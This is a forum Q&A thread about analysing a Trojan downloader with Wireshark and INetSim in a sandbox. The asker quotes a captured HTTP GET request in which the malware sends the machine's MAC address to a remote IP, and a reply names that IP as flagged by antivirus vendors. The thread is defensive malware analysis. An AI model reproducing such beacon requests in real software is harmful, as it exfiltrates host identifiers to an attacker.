hello I examined a Trojan downloader and I found that it sends the Local MAC address to a remote computer. can you please help me to understand the process using wireshark. BTW I use IDA Pro. asked 03 Feb '13, 12:26  Mimou Fares |
2 Answers:
Have you captured the traffic of the computer that has the trojan? That would be the first step - and please, don't do it ON the infected computer. Forensic captures are best taken by using a network TAP and another computer running a capture software like Wireshark/dumpcap. If you don't have a TAP you can try capturing via SPAN port. When you have a trace you could post it at www.cloudshark.org and post the URL. That way we can take a look at what you've got. answered 03 Feb '13, 14:49  Jasper ♦♦ |
yes, looks like a Trojan, at least SonicWall and McAfee say so (same IP address used: 64.247.39.247)
Regards answered 06 Feb '13, 12:52  Kurt Knochner ♦ edited 06 Feb '13, 12:55 |
thank you for your answer. to capture the traffic I used Wireshark within the infected machine (virtual) and INetSim in the host. I had the following HTTP quire
GET /confirm.php?aid=0&said=0&mac=08:xx:27:xx:DC:83&mn=1489 HTTP/1.1 User-Agent: wget 3.0 Host: 64.247.39.247 Cache-Control: no-cache
it seems also that Trojan sends the user name! where can I find such relevant information? thank you
well, basically you'll have to look through the trace you have and try to find any data transmitted that shouldn't be. POST or GET requests usually carry form data and parameters, so you should look at these. GET parameters are found in the URL, while POST parameters can be found at the bottom (line-base text data).